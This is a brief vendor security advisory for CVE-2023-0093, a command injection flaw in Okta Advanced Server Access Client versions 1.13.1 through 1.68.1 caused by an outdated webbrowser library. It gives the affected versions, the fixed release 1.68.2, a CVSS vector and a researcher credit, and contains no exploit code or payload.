Okta Advanced Server Access Client CVE-2023-0093
Okta Advanced Server Access Client versions 1.13.1 through 1.68.1 are vulnerable to command injection due to the third-party library webbrowser.
Affected product and versions
Okta’s Advanced Server Access customers that have currently installed or previously had installed versions 1.13.1 through 1.68.1 of the Okta Advanced Server Access Client.
The vulnerability is fixed in Okta Advanced Server Access Client version 1.68.2 To remediate this vulnerability, upgrade to 1.68.2 or greater.
An outdated library, webbrowser, used by the ASA client was found to be vulnerable to command injection. To exploit this issue, an attacker would need to phish the user to enter an attacker controlled server URL during enrollment.
|Vulnerability Type||OS Command Injection|
Vector string: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
Okta would like to thank Tao Sauvage from Anvil Secure for assistance on this finding.